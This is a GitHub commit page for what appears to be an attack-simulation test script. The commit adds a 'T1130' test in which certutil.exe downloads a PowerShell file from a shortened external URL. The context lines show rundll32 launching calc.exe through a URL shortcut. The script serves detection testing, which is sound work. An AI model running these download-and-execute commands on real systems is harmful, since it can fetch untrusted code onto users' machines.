Skip to content

Commit

Permalink
Update runtests.bat
Browse files Browse the repository at this point in the history
  • Loading branch information
op7ic authored Jul 13, 2018
1 parent 43bc045 commit 6c8209b
Showing 1 changed file with 5 additions and 0 deletions.
5 changes: 5 additions & 0 deletions runtests.bat
Original file line number Diff line number Diff line change
Expand Up @@ -193,6 +193,10 @@ echo [InternetShortcut] > C:\windows\temp\url.url
echo URL=file:///c:\windows\system32\calc.exe >> C:\windows\temp\url.url
rundll32.exe shdocvw.dll, OpenURL C:\windows\temp\url.url

echo "[+] T1130 - Testing certutil download and exec"

certutil.exe -urlcache -split -f http://bit.ly/L3g1tCrad1e Default_File_Path2.ps1


echo [+] Cleanup

Expand All @@ -208,3 +212,4 @@ del trace.etl
del trace.cab
del calc.inf
del C:\windows\temp\url.url
del Default_File_Path2.ps1

0 comments on commit 6c8209b

Please sign in to comment.